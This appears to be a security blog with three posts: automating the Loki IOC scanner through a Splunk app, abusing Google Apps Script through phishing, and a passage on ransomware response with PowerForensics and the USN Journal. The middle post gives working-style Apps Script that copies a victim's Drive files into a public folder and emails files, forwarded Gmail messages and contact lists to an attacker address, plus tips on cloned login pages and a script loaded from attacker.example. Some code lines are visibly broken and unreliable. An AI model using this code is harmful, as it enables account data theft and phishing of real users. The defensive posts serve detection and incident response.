Sunday, April 16, 2017

Automating APT Scanning with Loki Scanner and Splunk

One thing that I've been exploring lately is automating the large number of amazing open source security tools out in the world. One tool that has caught my interest is the Loki APT scanner created by BSK Consulting, a cool scanner that combines filename checks, IP addresses, domains, hashes, Yara rules, Regin file system checks, process anomaly checks, decompressed SWF scanning, SAM dump checks, etc. to find indicators of compromise on your system. From the Loki GitHub page, Loki currently includes the following IOC checks:
  • Equation Group Malware (Hashes, Yara Rules by Kaspersky and 10 custom rules generated by us)
  • Carbanak APT - Kaspersky Report (Hashes, Filename IOCs - no service detection and Yara rules)
  • Arid Viper APT - Trendmicro (Hashes)
  • Anthem APT Deep Panda Signatures (not officially confirmed - see Blog Post)
  • Regin Malware (GCHQ / NSA / FiveEyes) (incl. Legspin and Hopscotch)
  • Five Eyes QWERTY Malware (Regin Keylogger Module - see: Kaspersky Report)
  • Skeleton Key Malware (other state-sponsored Malware) - Source: Dell SecureWorks Counter Threat Unit(TM)
  • WoolenGoldfish - (SHA1 hashes, Yara rules) Trendmicro Report
  • OpCleaver (Iranian APT campaign) - Source: Cylance
  • More than 180 hack tool Yara rules - Source: APT Scanner THOR
  • More than 600 web shell Yara rules - Source: APT Scanner THOR
  • Numerous suspicious file name regex signatures - Source: APT Scanner THOR
  • Much more ... (cannot update the list as fast as I include new signatures)
The challenge with Loki is that it can be very laborious to run it and parse its scan results across an enterprise to find the needle in the haystack. In this post we'll show how to write a Splunk app to automate running Loki, parsing the results, and identifying what is important. As background, Loki is a CLI-based program that can scan a folder, your entire system, etc. for possible indicators of compromise. Basic Loki usage is:
usage: loki.exe [-h] [-p path] [-s kilobyte] [-l log-file] [-a alert-level]
                [-w warning-level] [-n notice-level] [--printAll]
                [--allreasons] [--noprocscan] [--nofilescan] [--noindicator]
                [--reginfs] [--dontwait] [--intense] [--csv] [--onlyrelevant]
                [--nolog] [--update] [--debug]    

Loki - Simple IOC Scanner    

optional arguments:
  -h, --help        show this help message and exit
  -p path           Path to scan
  -s kilobyte       Maximum file size to check in KB (default 2048 KB)
  -l log-file       Log file
  -a alert-level    Alert score
  -w warning-level  Warning score
  -n notice-level   Notice score
  --printAll        Print all files that are scanned
  --allreasons      Print all reasons that caused the score
  --noprocscan      Skip the process scan
  --nofilescan      Skip the file scan
  --noindicator     Do not show a progress indicator
  --reginfs         Do check for Regin virtual file system
  --dontwait        Do not wait on exit
  --intense         Intense scan mode (also scan unknown file types and all
                    extensions)
  --csv             Write CSV log format to STDOUT (machine processing)
  --onlyrelevant    Only print warnings or alerts
  --nolog           Don't write a local log file
  --update          Update the signatures from the "signature-base" sub
                    repository
  --debug           Debug output
Before we begin with the steps to create the Splunk app, download the latest Loki Windows binary from here. For the sake of this blog post we will only be focusing on running Loki in Windows, but the functionality can easily be extended to all operating systems. Once downloaded, run the command "loki.exe --update" to download the latest IOC files into the folder "signature-base" that will be used later.
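For reference, a one-off scan of a suspicious directory from an elevated command prompt might look like the following sketch (the paths are illustrative; the flags are from the usage output above):

```
loki.exe --update
loki.exe -p C:\Users\victim\Downloads --csv --onlyrelevant --dontwait -l C:\temp\loki.log
```

Running with --csv and -l gives you a machine-parseable log file, which is exactly what we'll feed to Splunk below.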

On a side note, if you would like to further update your IOCs to include AlienVault malicious IPs and domains and MISP IOCs, use the signature update files located in "signature-base\threatintel". You will require an API key from AlienVault Open Threat Exchange (OTX), and a MISP API key from a running MISP instance. The AlienVault API key is easy to get; the MISP instance is a little more difficult. In any case, once you have your keys you can write a script that pulls from either or both services and schedule a Cron job with the following commands:
# Update AlienVault OTX:
  python -k <API_KEY>

# Update MISP:
  python -k <API_KEY> -u <URL>
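For example, a nightly crontab entry along these lines would keep the feeds fresh (the update script's location and name depend on your setup, so treat them as placeholders):

```
# min hour dom mon dow  command
30 1 * * * cd /opt/loki/signature-base/threatintel && python <update_script>.py -k <API_KEY>
```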
Now that we have an updated Loki executable and signatures we are ready to create the Splunk App directory structure. In your Splunk Deployment Server create the following directories and files:
├── bin
|   ├── config\
|       ├── excludes.cfg
|   ├── signature-base\*
|   ├── loki.bat
|   └── loki.exe
├── default
|   ├── app.conf
|   ├── indexes.conf
|   ├── props.conf
|   ├── transforms.conf
|   └── inputs.conf
├── metadata
|   └── default.meta
Now that we have our directory structure, there are a couple of default files that will need to be created that we'll run through quickly:
1) $SPLUNK_HOME\etc\deployment_apps\Splunk_App_loki\bin\signature-base\*
# Copy the folder and its content created via the command "loki.exe --update" to the specified folder.
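Assuming you ran `loki.exe --update` in C:\loki, the copy can be done with something like the following (adjust both paths to your environment):

```
xcopy /E /I C:\loki\signature-base "C:\Program Files\Splunk\etc\deployment_apps\Splunk_App_loki\bin\signature-base"
```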
2) $SPLUNK_HOME\etc\deployment_apps\Splunk_App_loki\bin\config\excludes.cfg
This is actually a Loki default file, but should be included nonetheless.
# Excluded directories
# Ensure that you have the latest file from the excludes.cfg URL above.
# - add directories you want to exclude from the scan
# - double escape back slashes
# - values are case-insensitive
# - remember to use back slashes on Windows and slashes on Linux / Unix / OSX
# - each line contains a regex that matches somewhere in the full path (case insensitive)
#   e.g.:
#   Regex: \\System32\\
#   Matches C:\Windows\System32\cmd.exe
#   Regex: /var/log/[^/]+\.log
#   Matches: /var/log/test.log
#   Not Matches: /var/log/test.gz

# Useful examples (google "antivirus exclusion recommendations" to find more)
\\System Volume Information\\DFSR
The app.conf file maintains the state of a given app in Splunk Enterprise. It may also be used to customize certain aspects of an app.
## Splunk app configuration file

[install]
is_configured = true
state = enabled

[launcher]
author = epicism
version = 1.0
description = Technology Add-on for the Loki APT Scanner

[ui]
is_visible = false
label = Technology Add-on for Loki APT Scanner

[package]
id = Splunk_App_loki
The default.meta file contains ownership information, access controls, and export settings for Splunk objects such as saved searches, event types, and views. Each app has its own default.meta file.
[]
access = read : [ * ], write : [ admin ]
export = system
Now that we have the default files out of the way we can create the Loki-specific configuration files. First is the inputs.conf file that runs the script that executes the loki.exe binary and reads the loki scan results.

The inputs.conf file contains the settings you use to configure data inputs, including scripted inputs, distributed inputs such as forwarders, and file system monitoring.
# This is where you would place your signature update script if you created it:
# [script://$SPLUNK_HOME\etc\apps\loki\bin\signature-base\threatintel\updateintel.bat]
# disabled = true
# index = main
# interval = 30 1 * * *
# sourcetype = lokirun

# This entry runs the loki batch script and sends the script output to a null index.
# I could not get loki.exe's output to be ingested by Splunk when running it from this script,
# so I routed loki.exe's output to the $SPLUNK_HOME\...\loki.log in the next stanza.
[script://$SPLUNK_HOME\etc\apps\loki\bin\loki.bat]
disabled = false
index = main
interval = 0 2 * * *
sourcetype = lokirun
queueSize = 50MB

# The loki.bat batch script will save the loki.exe output to $SPLUNK_HOME\var\log\loki.log, and this reads it.
[monitor://$SPLUNK_HOME\var\log\splunk\loki.log]
disabled = false
index = loki
sourcetype = loki
This script moves its current working directory to the location of the script, overwrites loki.log so that it doesn't grow endlessly, and runs loki.exe. The relative path "..\..\..\..\var\log\splunk\" saves the output log in Splunk's log directory.
cd /d %~dp0
> ..\..\..\..\var\log\splunk\loki.log echo.
start /low /d "%~dp0" loki.exe --reginfs --csv --dontwait --onlyrelevant --noindicator --intense -l ..\..\..\..\var\log\splunk\loki.log
The following files are the configuration files used by the Splunk search head to parse the Loki log files. Loki's log output is supposed to be CSV, but only the first half of each line's values actually are, which required me to be creative when parsing the events. props.conf parses the properly comma-separated first half of the log line, and transforms.conf parses the rest.

A little on Props.conf - it is commonly used for:
  • Configuring line breaking for multi-line events;
  • Setting up character set encoding;
  • Allowing processing of binary files;
  • Configuring timestamp recognition;
  • Configuring event segmentation;
  • Overriding automated host and source type matching;
  • Configuring advanced (regex-based) host and source type overrides;
  • Overriding source type matching for data from a particular source;
  • Setting up rule-based source type recognition;
  • Renaming source types;
  • And so on...
Props.conf is an integral part of a Splunk app, and I recommend that you read the props.conf description in the URL above if you're not familiar with it.

# This stanza routes data that we don't want ingested into Splunk to the null queue
[lokirun]
LINE_BREAKER = ([\r\n]+)
disabled = 0
TRANSFORMS-null = setnull

# This stanza parses the loki.exe "CSV" output
[loki]
LINE_BREAKER = ([\r\n]+)
disabled = 0

# Example Log: 20170219T15:46:53Z,WIN-8J1HPPNE2HB,ALERT,FILE: C:\Users\x\Downloads\FlokiBot\64a23908ade4bbf2a7c4aa31be3cff24 SCORE: 100 TYPE: EXE SIZE: 400896 FIRST_BYTES: 4d5a90000300000004000000ffff0000b8000000 / MZ MD5: 64a23908ade4bbf2a7c4aa31be3cff24 SHA1: 2f87c2ce9ae1b741ac5477e9f8b786716b94afc5 SHA256: a4a810eebd2fae1d088ee62af725e39717ead68140c4c5104605465319203d5e CREATED: Tue Feb 07 13:45:11 2017 MODIFIED: Tue Feb 07 07:37:00 2017 ACCESSED: Tue Feb 07 13:45:11 2017REASON_1: Malware Hash TYPE: MD5 HASH: 64a23908ade4bbf2a7c4aa31be3cff24 SUBSCORE: 100 DESC: Flokibot Invades PoS: Trouble in Brazil
# EXTRACT-00-HEADER extracts the properly CSV-separated values at the start of the log line, and the REPORT-00-KEYVALUES transforms.conf entry parses the rest of the line.
EXTRACT-00-HEADER = ^(?<DATE>\d+)T(?<TIME>\d+:\d+:\d+)Z,(?<HOSTNAME>[^,]+),(?<SEVERITY>[^,]+),
# REPORT-00-KEYVALUES is responsible for parsing the remaining portion of the Loki event log not parsed by EXTRACT-00-HEADER. transforms.conf is good at parsing repeating values (such as "x=y" * z patterns), which is how Loki outputs its scan results.
REPORT-00-KEYVALUES = trans_keyvalues
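If you want to sanity-check EXTRACT-00-HEADER outside of Splunk, you can replay the same regex over a sample event. Here's a quick sketch in Python (note that Python spells named groups `(?P<name>...)` where Splunk accepts `(?<name>...)`):

```python
import re

# EXTRACT-00-HEADER, translated to Python's named-group syntax
header = re.compile(
    r'^(?P<DATE>\d+)T(?P<TIME>\d+:\d+:\d+)Z,'
    r'(?P<HOSTNAME>[^,]+),(?P<SEVERITY>[^,]+),'
)

sample = '20170219T15:46:53Z,WIN-8J1HPPNE2HB,ALERT,FILE: C:\\Users\\x\\sample.exe SCORE: 100'
m = header.match(sample)
print(m.group('DATE'), m.group('HOSTNAME'), m.group('SEVERITY'))
# 20170219 WIN-8J1HPPNE2HB ALERT
```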
A little on transforms.conf - it is commonly used for:
  • Configuring regex-based host and source type overrides;
  • Anonymizing certain types of sensitive incoming data, such as credit card or social security numbers;
  • Routing specific events to a particular index, when you have multiple indexes;
  • Creating new index-time field extractions. NOTE: We do not recommend adding to the set of fields that are extracted at index time unless it is absolutely necessary because there are negative performance implications;
  • And a lot more...
Like props.conf, transforms.conf is an integral configuration file to an app and I recommend that you read up on the URL to better understand the configuration file's function.

# This stanza is supposed to remove Loki's progress bar entries
[setnull]
REGEX = ^[\\\|\-\/\b]+$
DEST_KEY = queue
FORMAT = nullQueue

# This stanza removes the loki.exe execution entry (the stanza name here is illustrative;
# wire it up in props.conf with its own TRANSFORMS- entry)
[setnull_execline]
REGEX = ^.*?\\etc\\apps\\loki\\bin>loki\.exe --reginfs --csv --dontwait --onlyrelevant --intense\s+$
DEST_KEY = queue
FORMAT = nullQueue

# The REGEX parses the repeating "KEY: value" pattern that isn't comma separated by
# performing a lookahead to detect the next "KEY: " entry.
# FORMAT = $1::$2 tells Splunk to use the first captured group as the field name and the
# second captured group as the field value.
# Message me if you would like a deeper breakdown of how this works, and I would be happy to explain it.
[trans_keyvalues]
REGEX = ([\w\d]+):\s(.*?)(?=((\s[\d\w]+:\s)|$))
FORMAT = $1::$2
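To see what that regex actually does to the non-CSV half of the line, here it is replayed in Python over a fragment of the example log (illustration only; Splunk applies it via the REPORT- setting):

```python
import re

# The trans_keyvalues REGEX: lazily capture a value, stopping at the next "KEY: " token
kv = re.compile(r'([\w\d]+):\s(.*?)(?=((\s[\d\w]+:\s)|$))')

rest = 'SCORE: 100 TYPE: EXE SIZE: 400896 MD5: 64a23908ade4bbf2a7c4aa31be3cff24'
pairs = {m.group(1): m.group(2) for m in kv.finditer(rest)}
print(pairs)
# {'SCORE': '100', 'TYPE': 'EXE', 'SIZE': '400896', 'MD5': '64a23908ade4bbf2a7c4aa31be3cff24'}
```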
And that's it! Simple, right? It may be overwhelming if you're new to Splunk apps, but the main thing to know is that inputs.conf runs loki.bat (which runs loki.exe) and monitors the loki.log file for updated scan results, props.conf parses the first half of each Loki event, and transforms.conf parses the rest. Hopefully this is helpful, but if you need more information feel free to message me on Twitter and I can provide more details.

Now that we have a full app in your Splunk deployment server, re-deploy your deployment server apps using the command:
$SPLUNK_HOME/bin/splunk reload deploy-server
Now you should be able to see Splunk_App_loki in your Deployment server. Go to Settings -> Forwarder Management -> Apps, find Splunk_App_loki and click Edit.
Once in the App configuration section select the Reset Splunk checkbox and select Save.
Next, go to the Server Classes tab and create a new server class by clicking New Server Class.
Name it Loki_App_Class (or whatever you want) and click OK. This will bring you to the Loki_App_Class screen:
Note: if you chose to create the Splunk_TA_loki app, you can perform the same steps as above and add your search head to the clients list, or use the cluster manager.

In the Apps section of the page, click Edit to go to the App list page. Click the Splunk_App_loki app in the left-hand list to add it to the server class and click Save:
This will take you back to the Loki_App_Class page. Next you will add the clients that you want to run the Loki APT scanner on. Click the Edit button in the Clients section of the page to go to the list of clients (e.g. Splunk servers and Splunk Universal Forwarder servers). Add the Windows clients that you want to run Loki on a regular schedule by adding their hostnames to the Include (whitelist) textbox and click the Save button:

This will cause the clients in the Include (whitelist) of the Loki_App_Class to download and install the Loki app the next time they call in to the deployment server. Each day at 2:00 AM they will run Loki, save the results to "$SPLUNK_HOME\var\log\splunk\loki.log", and then ingest and parse the results into Splunk, taking events like the following:
20170417T01:36:13Z,WIN-8J1HPPNE2HB,ALERT,FILE: C:\Program Files\SplunkUniversalForwarder\var\log\splunk\loki.log SCORE: 4630 TYPE: UNKNOWN SIZE: 281385 FIRST_BYTES: 32303137303431375430313a33333a33365a2c57 / 20170417T01:33:36Z,W MD5: 99bb9f6343fc69159a6e03e1ef8c6428 SHA1: 58bf43a5c0ec496e62f2217cfa789df35d1ea953 SHA256: 4e1feaa3b24529737fa5accda9beaa841fb259ed5474087aa1017f8427544c04 CREATED: Sun Apr 16 18:33:36 2017 MODIFIED: Sun Apr 16 18:34:46 2017 ACCESSED: Sun Apr 16 18:33:36 2017REASON_1: Yara Rule MATCH: GRIZZLY_STEPPE_Malware_2 SUBSCORE: 70 DESCRIPTION: Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 MATCHES: Str1: GoogleCrashReport.dll Str2: CrashErrors Str3: CrashSend Str4: CrashAddData Str5: CrashCleanup Str6: CrashInitREASON_2: Yara Rule MATCH: Casper_Included_Strings SUBSCORE: 50 DESCRIPTION: Casper French Espionage Malware - String Match in File - MATCHES: Str1: cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST Str2: & SYSTEMINFO) ELSE EXIT Str3: Str4: perfaudio.dat
20170417T01:38:59Z,WIN-8J1HPPNE2HB,WARNING,FILE: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cache\f_0000ab SCORE: 70 TYPE: RAR SIZE: 257998 FIRST_BYTES: 526172211a0700cf907300000d00000000000000 / Rar!s MD5: b7bec1fe35e86afc5b00f2b72f684406 SHA1: c875243df43d7a0baababf7488df884acffae2f9 SHA256: f1209bbd5163a03c4543607a1ce2c69548fa6bddc977670fad845fc42216c69f CREATED: Mon Feb 06 09:11:44 2017 MODIFIED: Mon Feb 06 09:11:44 2017 ACCESSED: Mon Feb 06 09:11:44 2017REASON_1: Yara Rule MATCH: Cloaked_RAR_File SUBSCORE: 70 DESCRIPTION: RAR file cloaked by a different extension
and turning them into parsed key/value pairs that can be used to run reports showing all Loki scan results with a score of 70 and above, or to fire an alert on scores of 100:
Loki Parsed Logs
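With the fields extracted, reporting becomes ordinary SPL. A search along these lines (field names per the extractions above; the threshold is illustrative) can back a scheduled report or alert:

```
index=loki sourcetype=loki SEVERITY=ALERT SCORE>=70
| table _time, HOSTNAME, FILE, SCORE, MD5, REASON_1
```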
This is great, but, really, so what? What can we do with this information? The value in this post is in automating a manual task across your enterprise. You no longer have to manually run the Loki APT scanner on each system across your environment and parse through the results for possible issues. Automate, explore, expand, exploit, and exterminate (if I'm getting my references correct). With a sea of open source security tools that work well as manual processes, this solution can be an excellent method to provide fresh insight into the workings, and malevolent workings, of an enterprise.

Monday, February 27, 2017

Abusing Google App Scripting Through Social Engineering

I recently joined a new company (hooray) and have had the opportunity thus far to start thinking more heavily about a few topics that are, I suppose, newer to me.

Most of this focus has been on Google Apps for Business, but generally speaking, we've been thinking about many different challenges that are posed by large enterprises adopting cloud solutions. Often these services lack: functionality required at the enterprise level (sometimes something as basic as logging of a particular event), interoperability with other cloud services (leading to the rise of CASB tools), and offer only a reactive, API-driven approach to security and monitoring. Although many CASB solutions offer API-driven monitoring of a great variety of services, this is by its nature a reactive or detective approach.

The recent Cloudflare edge server vulnerability disclosed by Tavis Ormandy is a great example of the type of risk posed by widespread adoption of the 'cloud'. This isn't to say that I think the cloud is inherently insecure, or that I'm arguing against its adoption. Quite the contrary. The economic drivers supporting cloud adoption are difficult (at best) to argue against, and that alone is sufficient justification for the business to modify internal IT practice.

However, it is important to recognize that structural changes brought about by the widespread adoption of something 'new' and shiny can often lead to blind spots in our understanding of how it can be abused.

If we think of hacking or information security attacks as goal-driven endeavors that commonly have an end state of data theft or data destruction, then we have to acknowledge that the means by which we accomplish these tasks can vary significantly. Typically, this would require exploiting some sort of web application vulnerability and reading tables from a back end database. In recent years, the PowerShell Empire tool has included a number of fantastic scripts that allow you to hunt across file shares for sensitive data. There are a variety of exfiltration methods available to an attacker.

So .....
You'd probably say stop it with the memes and get to the point Greg. Ok, fine.

With some clever social engineering, and abuse of Google App Scripts, you can accomplish exactly this. Please keep in mind, this post is focusing specifically on Google Apps for Business users or personal Gmail users.

What are Google App Scripts?
Google App Scripts is essentially a JavaScript-based cloud scripting language (although the file extension is '.gs') that allows you to automate tasks across the range of Google services. There are a number of feature-rich APIs for accessing Gmail, Drive, Calendar, Contacts, etcetera.

For first-time users, if you browse to the Apps Script editor you'll be presented with the web UI for developing GS scripts. The detailed API reference manual can be found here. There are several ways to utilize App Scripts. They can be embedded in a Google Sheet or a Google Doc. But what I am most interested in is the ability to 'Deploy as Web App'. Why? It specifically has to do with the permission set.
The permissions for a web app differ depending on whether you choose to execute the app as the owner of the script or as the active user who is accessing the web app.
If you choose for the script to execute as you, then the script will always execute under your identity, that is, the identity of the owner of the script. This will be the case regardless of which user is accessing the web app.
If you choose for the script to execute as the user who accesses the web app, then the script will execute under the identity of the active user who is accessing your script.
That last part (italicized) is the crucial element. After you have written your Google App Script and you want to deploy it, you can specify that the script executes as the user accessing the page like so:
Now, whenever a user visits this link they will be presented with a permissions acceptance dialog prompt that varies depending on the type of functionality we build into our Google App Script:

Followed By:
I view this as the equivalent of 'enable macros'. Sure, an educated and aware user may stop at these prompts and realize that something is amiss. However, a lot of users aren't going to recognize anything bad here. This is a domain requesting permissions, and the application itself is hosted and served by Google. If the phishing lure is convincing enough, you can guarantee that many users will happily accept these warnings. Google does not provide any warning that the script could be from a third party or that it may in fact be malicious. The dialogue boxes do not 'feel' security related. Like many things in security, it comes down to user awareness.

So - what exactly can we do once the user clicks allow? I've written up a PoC to demonstrate some use cases and I'll walk through these below. Do we get code execution? No. But again, if our goal is access to/destruction of data, does it matter how we achieve that, especially in a world where our perimeter is porous and infrastructure design is increasingly cloud/service based? Moreover, use of this technique can be extremely powerful in extracting sensitive information from an organization that can be used for highly targeted follow-up attacks that may increase the likelihood of successful exploitation. From a reconnaissance perspective, this takes phishing to the next level (you aren't just getting, for example, User-Agent settings; now you can get actual internal data from the organization).
  • Create your application entry point. Since we are going to deploy this as a Web Application we need a doGet or doPost handler routine.
// Application Entry Point
// Application published to web requires doGet or doPost
function doGet(e) {
  var params = JSON.stringify(e);  // request parameters, should you want to log them
  drivePassSearch();               // kick off the Drive search described below
  return HtmlService.createHtmlOutputFromFile('Index');
}
  • You can see we call the drivePassSearch function first. This will search through the victim's Google Drive for file names matching a keyword and steal them. This function creates a publicly available RWX folder in the user's Drive account. You can apparently disable this for Google Apps for Business users, although I believe everything is very 'open' by default. Not sure if personal users have any such capability.
  • It searches for files on Drive that match our search criteria, records their name and location, makes a copy of the file in the public Drive share, and then emails a publicly accessible link to this share back to our attacker email address.
  • What are some use cases here? You can construct a search query for sensitive files housed on Drive. I've seen several organizations migrate entire file shares or SharePoint deployments to Drive with all sorts of sensitive data. Look for PDF, DOCX, XLSX files. You can search in the filename or inside the content of the document as well. It is also possible to use logical operators:
    • 'fullText contains SOMETHING'
    • 'title contains SOMETHING'
    • and (mimeType contains 'image/' or mimeType contains 'video/')
  • Try searching for file name containing .cer, .pem, .der, .crt, .pub, id_rsa, .docx, .pdf, .vsd, .nessus, .dit, password, etc - Get Creative!
function drivePassSearch() {
  var folder = DriveApp.createFolder('Evil Folder');
  folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);
  var files = DriveApp.searchFiles(
      'modifiedDate > "2013-02-28" and title contains "SEARCHTERM"');
  while (files.hasNext()) {
    var file =;
    var name = file.getName();
    // copy each matching file into the public folder and record its name and link
    file.makeCopy(name, folder);
    Logger.log(name + ' : ' + folder.getUrl());
  }
  • Now we take the data recorded by Logger and send it in an email back to our attacker email address. The message will come from the victim.
  var recipient = "ATTACKEREMAIL";
  var subject = 'Google Drive Query';
  var body = Logger.getLog();
  MailApp.sendEmail(recipient, subject, body);
  • If the organization has disabled publicly accessible Drive shares then you can use this workaround. Instead of uploading all files to this world-accessible Drive share, you can instead attach the file as a Blob to an email and send it to your attacker email address. 
  • This message will come from the victim user account. 
  • Warning: if your search term finds multiple files, it will send each one in a separate email. There are limits to how many emails a single account can send in a day.
  var recipient = "ATTACKEREMAIL";
  var files = DriveApp.getFilesByName('SEARCHTERM');
  while (files.hasNext()) {
    var file =;
    // each matching file goes out in its own email (mind the daily send quota)
    MailApp.sendEmail(recipient, 'Google Drive search - Attached Files',
        'Attached file matched a search term during Google Drive app script search.',
        {attachments: [file.getBlob()]});
  }


  • Next - we want to steal emails
  • Similarly we construct a search against GmailApp. The search term specified in that function is the same format as Gmail searches you are used to doing (link).
  • This function will search through all mail and, if it finds a message matching the search criteria, forward it to our attacker email address. Use cases: forward all emails with an attachment, all emails with the word confidential, all starred emails, etc.
function gmailKeySearch() {
  var recipient = "ATTACKEREMAIL";
  var threads ='subject:SEARCHTERM');
  for (var h = 0; h < threads.length; h++) {
    var messages = threads[h].getMessages();
    for (var i = 0; i < messages.length; i++) {
      if (messages[i].isStarred()) {
        var subject = messages[i].getSubject();
        var body = messages[i].getBody();
        // forward the matching message to the attacker address
        messages[i].forward(recipient, {
          subject: subject,
          htmlBody: body
        });
      }
    }
  }
}

  • Lastly, we mine the contacts database for information, compile a list of contacts, and send it back to our attacker email address.
  • Why? Attackers can use this to target additional individuals within the organization, construct bigger email spam lists, and generally compile more information about the target.

function contactsRePhish() {
  var contacts = ContactsApp.getContacts();
  // Only pulling name and primary email; many other fields are available to extract
  for (var i = 0; i < contacts.length; i++) {
    var name = contacts[i].getFullName();
    var email = contacts[i].getPrimaryEmail();
    Logger.log("Name: " + name + " Email: " + email);
  }

  var recipient = "ATTACKEREMAILADDRESS";
  var subject = 'Full List of Contacts';
  var body = Logger.getLog();
  MailApp.sendEmail(recipient, subject, body);
}

  • Keep in mind - with the example above we could have the victim user send an email from their account, to each of their contacts, asking them to click a link, or fill in information on a phishing website we have constructed. This is a great way to internally re-phish other users in an extremely convincing manner.
I'm sure people much smarter than myself could come up with other use cases. A few I haven't had time to explore: permanently delete all mail, permanently delete all Drive files, upload malicious files to Drive, and create triggers to set up a recurring task.

Lastly, at the end of our doGet(e) application handling function, we return "HtmlService.createHtmlOutputFromFile('Index')" (use createHtmlOutputFromFile, not createHtmlOutput, to serve a file). Index refers to an HTML file that we are passing to this object. The HTML file can be created in the script editor UI by going to File -> New -> HTML file. You can place whatever content in this HTML file to support your phishing scenario (I'd suggest HTTrack to clone a web page from your target, perhaps a Citrix/RAS login page). You can have it load a BeEF JS hook, post form fields (such as passwords) out to listening web servers under your control, etc. The best part of the 'deploy as web app' option is that we can actually deploy a functional web application in addition to all of the core data search and exfiltration functionality.
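As a trivial illustration, Index could be little more than a shell page that carries your lure and whatever script you want the visitor to load (the URL and content below are placeholders, not working infrastructure):

```html
<!-- Index.html: served back to the visitor by the doGet handler -->
<html>
  <body>
    <h3>Please sign in again to view the shared document</h3>
    <!-- e.g. a cloned login form posting to a server you control,
         or an external hook script -->
    <script src="https://attacker.example/hook.js"></script>
  </body>
</html>
```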

This isn't the first I've heard of Google App Script 'abuse'. There are a number of malware researchers who have published articles about Carbanak abusing Google App Scripts to host C2 infrastructure. But I have yet to see or read about Google App scripting abuse in a social engineering context.

Edit: A friend sent me a link to a post from Andrew Cantino back in 2014, which appears to be the first mention of this issue. Kudos to Andrew for identifying this issue and raising it with Google. I think it needs more attention/discussion.

For full code sample go here:

Thanks, and feedback is welcome as per usual.

Monday, November 21, 2016

Ransomware IR with PowerForensics and the USN Journal

Well it's certainly been a while since I made a post!

I last blogged in February about Malware analysis and you can find that post here. My thanks go to Dave and Abdul for keeping content coming while I was slacking. It's hard to believe the year is almost over. It was a pretty busy one for me, I changed roles, changed companies, and moved across the country. I'll use that as my excuse for being too lazy to write anything :)

I also wanted to say thanks to everyone who has viewed this blog. In the last year or so, we've managed to accumulate over 100,000 views! Honestly, the sole intent of starting this site was to document our own study efforts but we've had good feedback and hope to share content more consistently in the new year. This field is changing rapidly, and the scope of knowledge is constantly expanding. Hopefully we can help you feel a little less overwhelmed!

For this post, I wanted to document an experience I had on a recent investigation and share some thoughts about how I tackled this challenge, to hopefully benefit your investigations. Specifically, we'll be looking at: ransomware, live incident response using PowerForensics, and the USN Journal.

So let's dig in.

Our Scenario

Customer ABC requested assistance investigating a suspected case of Ransomware. An end user reported that file extensions had changed and they could no longer open documents. They also received a note demanding payment. The organization is curious to identify the source of the infection.

However there are two primary complications (both of which may be readily encountered in the real world). 
  1. The user's browser history is gone (either wiped by malware or by the user themselves - they may have been browsing inappropriate content and are concerned about the IT staff identifying this). We aren't concerned about recovering this data; we want to look for an alternate method to investigate the infection.
  2. The company does not retain centralized logs, nor do they have an adequate local firewall log retention policy. There are no web browsing/firewall logs to obtain. This is, of course, a finding in and of itself, but again, our focus here is working around these limitations.

In a typical situation, carving browser history and retrieving proxy/firewall logs would likely be sufficient to identify malicious traffic, but for this post we are assuming they are not available. It's important to have a variety of options when performing digital forensics and incident response. Conditions will often be less than ideal, so it's important to find creative alternatives.

For this scenario we will primarily use a single tool to perform live forensics on the compromised system: PowerForensics (from DFIR guru Jared Atkinson). This is an extremely powerful forensics framework composed of PowerShell (version 2 and higher) scripts that we can use to accomplish common DFIR tasks. Jared has an installation walkthrough, but I found some of its subtle nuances weren't addressed in detail, so I'd like to cover them here.

Note: Forensic best practice would advise you to take a complete, forensically sound, write-blocked image of the system, if possible, prior to executing any actions. You should always analyze an image and avoid working on a live system if it is confirmed as compromised. In this post we are performing live triage because it is being done in a 'lab' environment and for convenience's sake. Depending on the situation, analyzing live systems may be entirely acceptable and even preferred, but this is completely circumstantial and depends on the complexity and potential legal outcomes of your investigation (and the authorization of your superiors/client).

Tool Setup

On the infected machine:
  1. Download PowerForensics:
  2. Right-click the ZIP file, open Properties, check Unblock, and click Apply. This is required to properly install the module.
  3. Open a PowerShell command prompt as administrator.
  4. Run the command 'Set-ExecutionPolicy Unrestricted'
    1. If you have issues here consult this blog post:
  5. Close and re-open the PowerShell prompt as administrator
  6. Make note of your PowerShell version using the following command:
    $PSVersionTable.PSVersion
    This is important as you will need to use PowerForensicsv2 depending on the installed version of PowerShell. For example, Windows Server 2008 has version 2 of PowerShell installed by default.
  7. Now you need to identify your user module path. Use the following command:
    $env:PSModulePath -split ';'
    This should print a list of paths to PowerShell module folders. There may be several paths, but you can use one similar to: C:\Users\<username>\Documents\WindowsPowerShell\Modules
  8. The path identified above is where you need to unzip PowerForensics to. Remember, if your system is running PowerShell version 2, unzip PowerForensicsv2 to that location.
    Note: It looks like the latest version bundles in v2 so you should be able to handle different versions in-line. You may not need to worry about unzipping the correct version.
  9. Now you can use the following commands to import PowerForensics and view the available functions it comes packaged with:
    Get-Module -ListAvailable -Name PowerForensics
    Import-Module PowerForensics
    Get-Command -Module PowerForensics


There are lots of fantastic cmdlets that Jared has built, but in particular we'll be using "Get-ForensicUsnJrnl". You can pass it a path using the VolumeName switch to retrieve USN artifacts for a specific volume. Use Get-Help to obtain usage syntax for each cmdlet (Get-Help Get-ForensicUsnJrnl).

Why are we concerned with this specific cmdlet? To answer that we need a bit of background.

NTFS is Microsoft's proprietary file system; that is to say, it is responsible for keeping track of and managing files on disk. As computing requirements have grown more complex, file system standards have evolved to meet those needs, expanding to include a variety of features such as hard links, alternate data streams, and so on.

The USN Journal is a feature of NTFS which maintains a record of changes made to a specified volume; each volume maintains its own USN Journal log. The USN Journal is a system metafile and cannot be viewed in a regular directory listing. On most systems it is enabled by default, as Windows uses it for a number of core system operations (like file replication services). When NTFS objects are added, changed, or deleted, an entry is recorded in the USN Journal for the respective volume. This log does not contain enough information to 'reverse' a change; it is simply a record of activity that includes the type of change and the file object impacted.

Each USN entry is a data structure of the following format (Note: there are three different USN record formats depending on the version of Windows you are running; the one described below, version 2, is the oldest commonly encountered format, but they are all quite similar):

typedef struct {
  DWORD         RecordLength;
  WORD          MajorVersion;
  WORD          MinorVersion;
  DWORDLONG     FileReferenceNumber;
  DWORDLONG     ParentFileReferenceNumber;
  USN           Usn;
  LARGE_INTEGER TimeStamp;
  DWORD         Reason;
